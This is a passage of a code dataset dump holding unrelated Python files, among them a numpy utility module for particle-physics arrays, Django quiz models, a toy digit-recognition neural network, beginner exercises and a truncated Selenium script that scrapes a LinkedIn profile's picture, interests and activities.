{:.1f}y + {:.1f} = 0'.format(line_a, line_b, line_c))\n print('Line A: {:.1f}x + {:.1f}y + {:.1f} = 0'.format(la_a, la_b, la_c))\n print('Line B: {:.1f}x + {:.1f}y + {:.1f} = 0'.format(lb_a, lb_b, lb_c))\n print('Angles of A and B {} <-> {}'.format(ang_a, ang_b))\n print('Base angle', ang_base)\n\n #print('area_circle: {}'.format(area_circle))\n #print('area_a: {}'.format(area_a))\n #print('area_b: {}'.format(area_b))\n\n return total_area\n\nwhile True:\n line = input()\n if line == \"0 0 0\":\n break\n \n line = line.replace('\\n', '')\n line = line.split(' ')\n line = [int(x) for x in line]\n\n x, y, r = line\n\n line = input()\n line = line.replace('\\n', '')\n line = line.split(' ')\n line = [int(x) for x in line]\n p, q, a, t = line\n\n area1 = calcArea(x, y, r, p, q, a, t, False)\n area2 = calcArea(x, y, r, p, q, a, t, True)\n\n if area2 > area1:\n print('{:.1f}'.format(area2))\n else:\n print('{:.1f}'.format(area1))","sub_path":"Python/1102.py","file_name":"1102.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"4876820","text":"# Implement your solution by completing the below function\ndef trap(heights):\n ans = 0\n length=len(heights)\n left=[0]*length\n right=[0]*length\n left[0]=heights[0]\n for i in range(1,length):\n left[i]=max(left[i-1],heights[i])\n right[length-1]=heights[length-1]\n for i in range(length-2,-1,-1):\n right[i]=max(right[i+1],heights[i])\n \n for i in range(length):\n ans+=min(right[i],left[i])-heights[i]\n return ans\n\nif __name__ == '__main__':\n n = int(input())\n heights = []\n if (n != 0):\n heights = input().split()\n heights = [int(i) for i in heights]\n result = 
trap(heights)\n print(result)\n \n","sub_path":"trapwater.py","file_name":"trapwater.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"194118658","text":"'''\n------------------------------------------------------\nnp_utils.py (Jan 2019, romain.madar@clermont.in2p3.fr)\n------------------------------------------------------\n\n This Python module is basically a wrapper of functions to improve\n the use of numpy arrays for variable-size arrays. The main functions\n allow one to turn variable-size arrays into constant-size arrays, or to\n perform combinatorics without explicit loops (like pairing).\n\n These util functions were designed with HEP collider physics analysis\n in mind.\n \n'''\n\n\nimport numpy as np\nimport itertools\nimport copy\n\n\ndef count_nonnan(a, axis=-1):\n '''\n Count the number of non-NaN elements (those for which\n np.isnan() is False) along a given axis.\n '''\n if axis == -1:\n ntot = a.size\n else:\n ntot = a.shape[axis]\n return ntot-np.count_nonzero(np.isnan(a), axis=axis)\n\n\ndef replace_nan(a, value=0):\n '''\n Replace all np.nan from a by value (0 by default) and return\n a copy of the initial array.\n '''\n output = copy.copy(a)\n output[np.isnan(output)] = value\n return output\n\n\ndef replace_val(a, value_old, value_new=0):\n '''\n Replace all value_old from a by value_new (0 by default) and return a copy\n of the initial array.\n '''\n output = copy.copy(a)\n output[output == value_old] = value_new\n return output\n\n\ndef contains_collections(arrays):\n '''\n Return True if at least one of the sub-arrays\n in arrays has dimension at least 1.\n '''\n dims = np.array([e.ndim for e in arrays])\n return np.count_nonzero(dims >= 1) > 0\n\n\ndef get_indexed_value(a, index):\n '''\n Give an array of indexed values, with an event-dependent index.\n\n This function takes an array of shape (Nevts,Nobj) and returns an\n array of shape (Nevts,). Each element corresponds to the value of the\n ith object, where i is different for each event and is stored\n in the array 'index'. E.g., if one wants the lepton isolation\n for the lepton having the highest eta:\n - lep_iso, shape=(Nevts,Nlep)\n - index=np.argmax(np.abs(lep_eta),axis=1), shape=(Nevts,)\n - iso_max_eta=get_indexed_value(lep_iso,index), shape=(Nevts,)\n\n Parameters\n ----------\n a: np.array\n The shape of this array must be (Nevts,Nobj)\n index: np.array\n The shape of this array must be (Nevts,)\n\n Returns\n -------\n out: np.ndarray\n The shape of the array is (Nevts,)\n\n Examples\n --------\n >>> import numpy as np\n >>> a=np.arange(6).reshape(2,3)\n >>> a\n >>> array([[0, 1, 2],\n [3, 4, 5]])\n >>>\n >>> get_indexed_value(a,index=[0,1])\n >>> array([0, 4])\n '''\n\n # Make sure we manipulate numpy arrays\n a, index = np.array(a), np.array(index)\n\n # Sanity checks\n if a.ndim != 2 or index.ndim != 1:\n err = 'This function requires an array \\'a\\' of dimension 2 (it is currently {})\\n'.format(\n a.ndim)\n err += 'and an array \\'index\\' of dimension 1 (it is currently {})'.format(index.ndim)\n raise NameError(err)\n if a.shape[0] != index.shape[0]:\n err = 'The two arrays must have the same number of elements along the first axis.\\n'\n err += 'while currently \\'a\\' has {} elements and \\'index\\' has {}.'.format(\n a.shape[0], index.shape[0])\n raise NameError(err)\n\n # Actual work\n N = np.arange(a.shape[0])\n return np.array([a[i, index[i]] for i in N])\n\n\ndef get_all_but_indexed_value(a, index):\n '''\n Give an array of all values but the indexed ones, with\n an event-dependent index.\n\n This function takes an array of shape (Nevts,Nobj) and returns an\n array of shape (Nevts,Nobj-1). Each row contains the values of\n all objects but the ith, where i is different for each event and is\n stored in the array 'index'. E.g., if one wants the lepton isolation\n for all leptons but the one with the highest eta:\n - lep_iso, shape=(Nevts,Nlep)\n - index=np.argmax(np.abs(lep_eta),axis=1), shape=(Nevts,)\n - iso_other_eta=get_all_but_indexed_value(lep_iso,index), shape=(Nevts,Nlep-1)\n\n\n Parameters\n ----------\n a: np.array\n The shape of this array must be (Nevts,Nobj)\n index: np.array\n The shape of this array must be (Nevts,)\n\n\n Returns\n -------\n out: np.ndarray\n The shape of the array is (Nevts,Nobj-1)\n\n\n Examples\n --------\n >>> import numpy as np\n >>> a=np.arange(6).reshape(2,3)\n >>> a\n >>> array([[0, 1, 2],\n [3, 4, 5]])\n >>>\n >>> get_all_but_indexed_value(a,index=[0,1])\n >>> array([[1, 2],\n [3, 5]])\n '''\n\n # Make sure we manipulate numpy arrays\n a, index = np.array(a), np.array(index)\n\n # Sanity checks\n if a.ndim != 2 or index.ndim != 1:\n err = 'This function requires an array \\'a\\' of dimension 2 (it is currently {})\\n'.format(\n a.ndim)\n err += 'and an array \\'index\\' of dimension 1 (it is currently {})'.format(index.ndim)\n raise NameError(err)\n if a.shape[0] != index.shape[0]:\n err = 'The two arrays must have the same number of elements along the first axis.\\n'\n err += 'while currently \\'a\\' has {} elements and \\'index\\' has {}.'.format(\n a.shape[0], index.shape[0])\n raise NameError(err)\n\n N = np.arange(a.shape[0])\n return np.array([np.concatenate([a[i, :index[i]], a[i, index[i]+1:]]) for i in N])\n\n\ndef square_jagged_2Darray(a, **kwargs):\n '''\n Give the same dimension to all rows of a jagged 2D array.\n\n This function equalizes the size of every row (object collection)\n using a default value 'val' (nan if nothing specified) using either\n the maximum size of the object collection among all rows (events) or\n using a maximum size 'size'. The goal of this function is to fully\n use numpy vectorization which works only on fixed-size arrays.\n\n Parameters\n ----------\n a: array of arrays with different sizes; this is the jagged 2D\n array to be squared\n\n keyword arguments\n -----------------\n dtype: string\n data type of the variable-size array. If not specified,\n it is 'float32'. None means dt=data.dt.\n nobj: int\n max size of the array.shape[1]. if not specified (or None),\n this size is the maximum size of all rows.\n val: float32\n default value used to fill empty elements in order to get\n the proper size. If not specified (or None), val is np.nan.\n\n Returns\n -------\n out: np.ndarray\n with a dimension (ncol,nobj).\n\n Examples\n --------\n >>> import numpy as np\n >>> a=np.array([\n [1,2,3,4,5],\n [6,7],\n [8],\n [9,10,11,12,13]\n ])\n >>>\n >>> square_jagged_2Darray(a)\n array([[ 1., 2., 3., 4., 5.],\n [ 6., 7., nan, nan, nan],\n [ 8., nan, nan, nan, nan],\n [ 9., 10., 11., 12., 13.]], dtype=float32)\n >>>\n >>> square_jagged_2Darray(a,nobj=2,val=-999)\n >>> array([[ 1., 2.],\n [ 6., 7.],\n [ 8., -999.],\n [ 9., 10.]], dtype=float32)\n '''\n\n # Sanity checks\n if a.ndim >= 2:\n err = 'The input array a should be a 1D array of 0D/1D arrays. This means that '\n err += 'a.shape=(N,) or (1,) while here '\n err += 'a.shape={}'.format(a.shape)\n raise NameError(err)\n dims = np.array([e.ndim for e in a])\n Neq0, Ngt2 = np.count_nonzero(dims == 0), np.count_nonzero(dims >= 2)\n if Neq0 == len(a):\n return a\n if Neq0 > 0 or Ngt2 > 0:\n err = 'The input array should be a 1D array of 1D arrays'\n err += ' in order to be converted into a 2D array.\\n Some'\n err += ' of the sub-arrays have dim>=2 or dim=0 (ie not an array):\\n'\n err += ' -> Number of d==0 elements: {} (if ==len(a), it\\'s not a jagged array!)\\n'.format(Neq0)\n err += ' -> Number of d>=2 elements: {}\\n'.format(Ngt2)\n raise NameError(err)\n\n # kwargs\n val, size, dtype = np.nan, None, 'float32'\n if 'dtype' in kwargs:\n dtype = kwargs['dtype']\n if 'nobj' in kwargs:\n size = kwargs['nobj']\n if 'val' in kwargs:\n val = kwargs['val']\n\n # Get lengths of each row of data\n lens = np.array([len(i) for i in a])\n\n # Mask valid places in each row\n mask = np.arange(lens.max()) < lens[:, None]\n\n # Setup output array and put elements from data into masked positions\n if (dtype):\n dt = dtype\n else:\n dt = a.dtype\n out = np.zeros(mask.shape, dtype=dt)\n out.fill(val)\n out[mask] = np.concatenate(a)\n\n # Keep the number of elements to at most 'size'\n if size:\n out = out[:, :size]\n\n return out\n\n\ndef all_pairs_nd(a, b=None, Nmax=None, axis=1, timing=False):\n '''\n Compute all possible pairs along a given axis.\n\n This function builds the list of all possible pairs along a given axis\n between the two arrays a and b. The typical use case is the following:\n there are Nevts events with two collections of 5 vectors {r_i} and 10 vectors\n {q_j} (where each vector q,r=(px,py,pz)), and the pair (q,r) with the smallest\n distance is wanted. In that case, one has:\n a.shape=(Nevts, 5,3)\n b.shape=(Nevts,10,3)\n all_pairs_nd(a,b).shape=(Nevts,50,2,3)\n\n NB1: If only a is given, the unordered/unrepeated combinations\n are performed.\n NB2: all axes must have the same dimension, except the one along which the\n pairing is done.\n\n Parameters\n ----------\n a: np.ndarray\n The array contains the objects collection for each event. If Nobj_a\n is the number of objects a and k the number of variables of each object a\n (e.g. [px,py,pz,E,btagg,iso]): a.shape=(Nevt,Nobj_a,k)\n b: np.ndarray\n The array contains the objects collection for each event. If Nobj_b\n is the number of objects and l the number of variables of each object b\n (e.g. [px,py,pz,E,btagg,iso]): l must be equal to k and b.shape=(Nevt,Nobj_b,k).\n If not specified, combinations of a elements are returned.\n Nmax: int\n Maximal number of elements considered to compute all combinations\n axis: int\n The dimension along which the pairing is done (axis=1 if not specified since\n the most common HEP array is (Nevt,Nobj,k)).\n timing: boolean\n Print the time of each of the four main steps and the total one (useful\n to debug).\n\n Returns\n -------\n pairs: np.ndarray\n For each event (element along axis=0), the output array has Npairs pairs of 2 objects,\n meaning that output.shape=(Nevt, Npairs, 2, k).\n\n Examples\n --------\n >>> import numpy as np\n >>> a=np.array([ # Nevt=1, Nobj=3, k=2\n [[0, 1],[2, 3],[4, 5]]\n ])\n >>>\n >>> b=np.array([ # Nevt=1, Nobj=2, k=2\n [[6, 7],[8, 9]]\n ])\n >>>\n >>> all_pairs_nd(a,b)\n >>> array([\n [\n [[0, 1],[6, 7]],\n\n [[0, 1],[8, 9]],\n\n [[2, 3],[6, 7]],\n\n [[2, 3],[8, 9]],\n\n [[4, 5],[6, 7]],\n\n [[4, 5],[8, 9]]\n ]\n ])\n >>>\n >>> all_pairs_nd(a)\n >>> array([\n [\n [[0, 1],[2, 3]],\n\n [[0, 1],[4, 5]],\n\n [[2, 3],[4, 5]]\n ]\n ])\n >>>\n >>> npu.all_pairs_nd(a,Nmax=2)\n >>> array([\n [\n [[0, 1],[2, 3]]\n ]\n ])\n '''\n\n from timeit import default_timer\n t0 = default_timer()\n\n # Is it the same collection\n same_arrays = b is None\n\n # Sanity check\n if not same_arrays:\n good_shape = np.array_equal(np.delete(a.shape, axis), np.delete(b.shape, axis))\n if not good_shape:\n err = 'The shape along all dimensions but the one of axis={}'.format(axis)\n err += ' should be equal, while here:\\n'\n err += ' -> shape of a is {} \\n'.format(a.shape)\n err += ' -> shape of b is {} \\n'.format(b.shape)\n raise NameError(err)\n\n # Reduce the number of objects to Nmax\n if Nmax:\n sl = [slice(None)]*a.ndim\n sl[axis] = slice(0, Nmax)\n if same_arrays:\n a, b = a[tuple(sl)], None\n else:\n a, b = a[tuple(sl)], b[tuple(sl)]\n\n t1 = default_timer()\n if timing:\n print(' * Sanity checks done in {:.3f}s'.format(t1-t0))\n\n # Individual indices\n if same_arrays:\n ia, jb = np.arange(a.shape[axis]), []\n else:\n ia, jb = np.arange(a.shape[axis]), np.arange(b.shape[axis])\n\n t2 = default_timer()\n if timing:\n print(' * Individual indices done in {:.3f}s'.format(t2-t1))\n\n # Pairs of indices\n dt = np.dtype([('', np.intp)]*2)\n if same_arrays:\n ij = np.fromiter(itertools.combinations(ia, 2), dtype=dt)\n else:\n ij = np.fromiter(itertools.product(ia, jb), dtype=dt)\n ij = ij.view(np.intp).reshape(-1, 2)\n\n t3 = default_timer()\n if timing:\n print(' * Pairs of indices done in {:.3f}s'.format(t3-t2))\n\n # Array of all pairs\n if same_arrays:\n out = np.take(a, ij, axis=axis)\n else:\n out = np.stack([a.take(ij[:, 0], axis=axis), b.take(ij[:, 1], axis=axis)], axis=axis+1)\n\n t4 = default_timer()\n if timing:\n print(' * Take and stack arrays done in {:.3f}s'.format(t4-t3))\n if timing:\n print(' ==> total time: {:.3f}s'.format(t4-t0))\n\n return out\n\n\ndef df2array(df, variables, **kwargs):\n '''\n Convert a list of Ncols pandas dataframe columns into a regular\n (Nevt,Nobj,Ncol)-dim numpy array.\n\n In practice, the exact size of the final array is Nevt (the number\n of events), Nobj (number of objects) and Ncol which is the number of\n floats for each event and object.\n\n It is possible to give default values in order to later form collections\n with the same number of variables:\n jets =df2array(df,['jet_eta', 'jet_phi', 'jet_bw', '999'])\n electrons=df2array(df,[ 'el_pt' , 'el_phi' , 'nan', 'trk_iso'])\n pairs =all_pairs_nd(jets,electrons)\n This makes it possible to get the electron isolation and the b-tagging weight\n for the electron-jet pair that is closest to each other.\n\n Parameters\n ----------\n df: pandas.DataFrame\n variables: list of column names to extract\n\n keyword arguments\n -----------------\n The same as for square_jagged_2Darray(a,**kwargs) function\n\n Returns\n -------\n output: np.array\n 3D array given with output.shape=(df[v].shape[0],df[v].shape[1],len(variables))\n\n Examples\n --------\n >>>\n >>> data=pd.DataFrame(data={\n 'jet_eta':np.array([np.array([1,2,3]),np.array([4,5])]),\n 'jet_phi':np.array([np.array([6,7,8]),np.array([9,10])]),\n })\n >>> print(data)\n >>> jet_eta jet_phi\n 0 [1, 2, 3] [6, 7, 8]\n 1 [4, 5] [9, 10]\n >>>\n >>> jets_direction=npu.df2array(data,['jet_eta','jet_phi'])\n >>> jets_direction\n >>> array([[[ 1., 6.],\n [ 2., 7.],\n [ 3., 8.]],\n\n [[ 4., 9.],\n [ 5., 10.],\n [ nan, nan]]], dtype=float32)\n '''\n\n # Get the default array with the proper shape\n if variables[0] not in df.columns:\n err = 'The first variable must be a valid column and not a default value.\\n'\n err += 'The variable \\'{}\\' is not in the list of dataframe columns'.format(variables[0])\n raise NameError(err)\n Nevt, Nobj = len(df), np.max([len(i) for i in df[variables[0]].values])\n if 'nobj' in kwargs:\n Nobj = kwargs['nobj']\n\n def default_array(str_val):\n try:\n val = float(str_val)\n except ValueError:\n if str_val in ('nan', 'NaN', 'Nan', 'NAN'):\n val = np.nan\n else:\n err = 'The default value \\'{}\\' is not supported. Please only use '.format(str_val)\n err += 'a number in a string (e.g. \\'999\\') or \\'nan\\'.'\n raise NameError(err)\n return np.full_like(np.zeros((Nevt, Nobj)), val)\n\n # Get the list of all arrays, each of shape: (Nevts,Nobj)\n list_arrays = [square_jagged_2Darray(df[v].values, **kwargs)\n if v in df.columns else default_array(v) for v in variables]\n\n # Check whether these are collections (and not only single values, like MET)\n isCollection = contains_collections(list_arrays)\n\n # Adding a dimension for further concatenation in case of\n # (Nevts,Nobj) shape; new shape is (Nevts,Nobj,1)\n list_arrays = [a[..., None] if a.ndim == 2 else a for a in list_arrays]\n\n # Check that the number of objects is the same for all columns\n if isCollection:\n axis = 2\n if np.std([a.shape[1] for a in list_arrays]) != 0:\n err = 'The shape along the dimensions of axis=1 (number of objects) '\n err += 'must be the same for all variables. This function cannot merge different '\n err += 'object collections (eg \"jet_pT\" and \"ele_pT\").\\n'\n err += 'If you need to do so, check the stack_collections() function.'\n raise NameError(err)\n else:\n axis = 1\n\n # Perform the concatenation; output shape is (Nevts,Nobj,Nvariables)\n return np.concatenate(list_arrays, axis=axis)\n\n\ndef stack_collections(arrays):\n '''\n Stack list of arrays of shape (Nevts,Nobj_i,Nval) along axis=1.\n\n The typical use case of the function is to build a single collection\n of objects from different collections. Let's take the example where\n one wants to make a 'lepton' collection out of 'electron' and 'muon'\n collections: each collection has Nval variables so that each array will\n be of shape el.shape=(Nevts,Nel,Nval) and mu.shape=(Nevts,Nmu,Nval).\n lep=stack_collections([el,mu]) will have lep.shape=(Nevt,Nel+Nmu,Nval).\n\n\n Parameters:\n ----------\n arrays: list of ndarray\n arrays which need to be stacked\n\n\n Return:\n -------\n output: ndarray\n array of shape (Nevt,Ntot,Nval) where Ntot\n is the sum of all objects (e.g. Nlep+Njet)\n\n\n Examples:\n --------\n >>> a=np.arange(30).reshape(2,5,3)\n >>> a # 2 events, 5 objects, 3 variables\n >>> array([\n [\n [ 0, 1, 2],\n [ 3, 4, 5],\n [ 6, 7, 8],\n [ 9, 10, 11],\n [12, 13, 14]\n ],\n\n [\n [15, 16, 17],\n [18, 19, 20],\n [21, 22, 23],\n [24, 25, 26],\n [27, 28, 29]\n ]\n ])\n >>>\n >>> b=np.arange(12).reshape(2,2,3)\n >>> b # 2 events, 2 objects, 3 variables\n >>> array([\n [\n [ 0, 1, 2],\n [ 3, 4, 5]\n ],\n\n [\n [ 6, 7, 8],\n [ 9, 10, 11]\n ]\n ])\n >>>\n >>> npu.stack_collections([a,b])\n >>> array([\n [\n [ 0, 1, 2],\n [ 3, 4, 5],\n [ 6, 7, 8],\n [ 9, 10, 11],\n [12, 13, 14],\n [ 0, 1, 2],\n [ 3, 4, 5]\n ],\n\n [\n [15, 16, 17],\n [18, 19, 20],\n [21, 22, 23],\n [24, 25, 26],\n [27, 28, 29],\n [ 6, 7, 8],\n [ 9, 10, 11]\n ]\n ])\n '''\n\n # Check that these are collections\n if not contains_collections(arrays):\n err = 'One of the arrays is not a collection, while this function needs '\n err += 'collections of objects (ie at least 2D arrays - 1D for events '\n err += 'and 1D for the collection)'\n raise NameError(err)\n\n # Check that the number of variables per object is the same for all collections\n has_one_var = np.count_nonzero([a.ndim == 1 for a in arrays]) == len(arrays)\n if has_one_var:\n is_ok = True\n elif len(np.unique([a.shape[2] for a in arrays])) == 1:\n is_ok = True\n else:\n is_ok = False\n if not is_ok:\n err = 'The shape along the dimensions of axis=2 (number of variables per object) '\n err += 'must be the same for all objects. This function cannot merge '\n err += 'collections with different numbers of variables (eg [jet_pT,jet_eta] and [ele_pT]).\\n'\n raise NameError(err)\n\n out = np.concatenate(arrays, axis=1)\n return out\n","sub_path":"lecture/np_utils.py","file_name":"np_utils.py","file_ext":"py","file_size_in_byte":20059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"468567204","text":"'''\n6.6. 
Adição de elementos à lista\n'''\n\nL = []\n\nwhile True:\n n = int(input(\"Digite um número: ('0' para sair): \"))\n if n == 0:\n print(\"Saindo do programa...\")\n break\n L.append(n)\n\nx = 0\nwhile x < len(L):\n print(L[x])\n x += 1\n\nprint(f\"Lista completa: {L}\")\n","sub_path":"pythonBook/chapter06/exercise6-6.py","file_name":"exercise6-6.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"301989496","text":"from django.db import models\n\nclass Test(models.Model):\n \n title = models.TextField(\n verbose_name='Название теста',\n max_length=255,\n )\n\n def __str__(self):\n return self.title\n\n class Meta():\n verbose_name = 'Тест'\n verbose_name_plural = 'Тесты' \n\nclass Answer(models.Model):\n\n question = models.ForeignKey(\n to=\"Question\",\n on_delete = models.CASCADE,\n related_name='answers'\n )\n\n title = models.TextField(\n verbose_name='Вариант ответа',\n max_length=200,\n )\n\n is_correct_answer = models.BooleanField(\n verbose_name='Правильный ответ'\n )\n \n def __str__(self):\n return '%s' % self.title\n\n class Meta():\n verbose_name = 'Ответ'\n verbose_name_plural = 'Ответы' \n\nclass Question(models.Model):\n test = models.ForeignKey (\n to = Test,\n on_delete = models.CASCADE,\n related_name = 'questions'\n\n )\n\n title = models.TextField(\n verbose_name='Вопрос',\n max_length=400,\n )\n\n def __str__(self):\n return '%s' % self.title\n\n class Meta():\n verbose_name = 'Вопрос'\n verbose_name_plural = 'Вопросы' \n\n\n","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"451127463","text":"from seamless.highlevel import Context, mylib\n\nctx = Context()\nctx.spam = \"spam\"\nmylib.Test = ctx\nmylib.Test.set_constructor(\n constructor=lambda ctx: ctx,\n post_constructor=None,\n args=[],\n direct_library_access=True\n)\nctx = Context()\nctx.test = mylib.Test()\nprint(ctx.test.spam)\nprint(ctx.test.spam.value)\n","sub_path":"tests/highlevel/constructor/simplest.py","file_name":"simplest.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"497743547","text":"import numpy as np\r\n\r\n\r\n\r\n\r\n\r\nclass NeuralNetwork():\r\n\r\n def __init__(self):\r\n # Сид генератора чисел для одинаковой работы программы\r\n np.random.seed(1)\r\n\r\n # Задаём случайные веса(10 цифр по 15 клеточек)\r\n self.synaptic_weights = 2 * np.random.random((10, 15, 1)) - 1\r\n\r\n def sigmoid(self, x):\r\n \"\"\"\r\n\t\tСигмоида\r\n \"\"\"\r\n return 1 / (1 + np.exp(-x))\r\n\r\n def sigmoid_derivative(self, x):\r\n \"\"\"\r\n\t\tПроизводная сигмоиды\r\n \"\"\"\r\n return x * (1 - x)\r\n\r\n\r\n def trainpro(self, training_inputs, training_outputs,j):\r\n\r\n \"\"\"\r\n\t\tОбучение методом обратного распространения\r\n\t\tОдин цикл нужен для прогресс бара\r\n \"\"\"\r\n\r\n output = self.think(training_inputs, j)\r\n\r\n error = training_outputs[j].T - output\r\n\r\n adjustments = np.dot(\r\n training_inputs.T, error * self.sigmoid_derivative(output))\r\n\r\n self.synaptic_weights[j] += adjustments\r\n\r\n def train(self, training_inputs, training_outputs, training_iterations):\r\n \"\"\"\r\n\t\tОбучение методом обратного распространения\r\n \"\"\"\r\n for j in range(10):\r\n for iteration in range(training_iterations):\r\n output = 
self.think(training_inputs, j)\r\n\r\n \r\n error = training_outputs[j].T - output\r\n\r\n\r\n adjustments = np.dot(\r\n training_inputs.T, error * self.sigmoid_derivative(output))\r\n\r\n\r\n self.synaptic_weights[j] += adjustments\r\n \r\n\r\n def think(self, inputs, number):\r\n \"\"\"\r\n Функция которая пропускает данные через нейросеть и выдаёт вердикт\r\n \"\"\"\r\n\r\n inputs = inputs.astype(float)\r\n output = self.sigmoid(np.dot(inputs, self.synaptic_weights[number]))\r\n return output\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Инициализация нейросети\r\n neural_network = NeuralNetwork()\r\n\r\n # Тренировочные данные, состоящие из 10 цифр\r\n training_inputs = np.array([[1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1],\r\n [0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1],\r\n [1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1],\r\n [1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1],\r\n [1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1],\r\n [1, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1],\r\n [1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1],\r\n [1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1],\r\n [1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1]])\r\n # Выходные данные на каждую цифру\r\n training_outputs = np.array([[[1, 0, 0, 0, 0, 0, 0, 0, 0, 0]],\r\n [[0, 1, 0, 0, 0, 0, 0, 0, 0, 0]],\r\n [[0, 0, 1, 0, 0, 0, 0, 0, 0, 0]],\r\n [[0, 0, 0, 1, 0, 0, 0, 0, 0, 0]],\r\n [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0]],\r\n [[0, 0, 0, 0, 0, 1, 0, 0, 0, 0]],\r\n [[0, 0, 0, 0, 0, 0, 1, 0, 0, 0]],\r\n [[0, 0, 0, 0, 0, 0, 0, 1, 0, 0]],\r\n [[0, 0, 0, 0, 0, 0, 0, 0, 1, 0]],\r\n [[0, 0, 0, 0, 0, 0, 0, 0, 0, 1]]])\r\n\r\n # Вызов функции тренировки\r\n neural_network.train(training_inputs, training_outputs, 20000)\r\n\r\n print(neural_network.synaptic_weights)\r\n\r\n print(\"Output data: \")\r\n for j in range(10):\r\n print(j, \" : %.4f\" % neural_network.think(\r\n np.array([1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1]), j))\r\n","sub_path":"bleeding_edge.py","file_name":"bleeding_edge.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"169807952","text":"import pickle\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport config\nimport logging\n\n\nclass Profile:\n def __init__(self, driver, profile):\n self.have_recent_activities = False\n self.LinkedIn_Dict = {}\n self.driver = driver\n self.profile = profile\n\n self.login(email=config.email, password=config.password)\n self.driver.get(self.profile)\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pv-top-card--list.inline-flex.align-items-center\")))\n logging.info(\"successfully fetched profile\")\n\n def scrape(self):\n self.printProgressBar(0, 7, \"checking for recent activities\\t\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n self.check_recent_activities()\n self.printProgressBar(1, 7, \"fetching profile picture\\t\\t\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n self.fetch_profile_picture()\n self.printProgressBar(2, 7, \"fetching interest categories\\t\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n self.fetch_interest_categories()\n self.printProgressBar(5, 7, \"fetching recent activities\\t\\t\", 
\"Complete\", length=50, printEnd=\"\\r\\n\")\n self.fetch_recent_activies()\n self.printProgressBar(6, 7, \"extracting keywords using NLP model\", \"Complete\", length=50, printEnd=\"\\r\\n\")\n pickle.dump(self.driver.get_cookies(), open(\"cookies.pkl\", \"wb\"))\n self.driver.quit()\n\n logging.info(\"finished scrapping\")\n\n def check_recent_activities(self):\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located(\n (By.CLASS_NAME, \"pv-recent-activity-section-v2__summary.t-14.t-black--light.t-normal\")))\n if \"last 90 days are displayed here\" not in \\\n self.driver.find_element_by_class_name(\n \"pv-recent-activity-section-v2__summary.t-14.t-black--light.t-normal\").text:\n self.have_recent_activities = True\n else:\n logging.warning(\"no recent activities\")\n\n def fetch_profile_picture(self):\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located(\n (By.CLASS_NAME, \"presence-entity.presence-entity--size-9.pv-top-card__image\")))\n profile_pic = self.driver.find_element_by_class_name(\n \"presence-entity.presence-entity--size-9.pv-top-card__image\").find_element_by_xpath(\"./img\")\n if \"data:image/gif\" in profile_pic.get_attribute('src'):\n self.LinkedIn_Dict[\"Profile Picture\"] = None\n logging.warning(\"no profile picture\")\n else:\n self.LinkedIn_Dict[\"Profile Picture\"] = profile_pic.get_attribute('src')\n logging.info(\"successfully fetched profile picture\")\n\n def fetch_interest_categories(self):\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight)\")\n self.LinkedIn_Dict['Interests'] = {}\n self.driver.get(self.profile + '/detail/interests/')\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.XPATH, \"//*[contains(@id, 'pv-interests-modal__following')]\")))\n interest_categories = self.driver.find_elements_by_xpath(\"//*[contains(@id, 'pv-interests-modal__following')]\")\n\n for interest_category in interest_categories:\n self.LinkedIn_Dict['Interests'][interest_category.text] = interest_category.get_attribute('href')\n\n logging.info(\"successfully fetched interest categories\")\n logging.debug('found', len(self.LinkedIn_Dict['Interests']), 'interest categories')\n\n i = 1\n for key, values in self.LinkedIn_Dict['Interests'].items():\n self.driver.get(values)\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pv-entity__summary-title-text\")))\n WebDriverWait(self.driver, 1)\n if key == 'Influencers':\n interest_names = self.driver.find_elements_by_class_name(\"pv-entity__summary-title-text\")\n interest_descriptions = self.driver.find_elements_by_class_name(\"pv-interest-entity-link.ember-view\")\n self.LinkedIn_Dict['Interests'][key] = [\n {'Name': interest_name.text, 'Description': interest_description.get_attribute(\"href\")}\n for interest_name, interest_description in zip(interest_names, 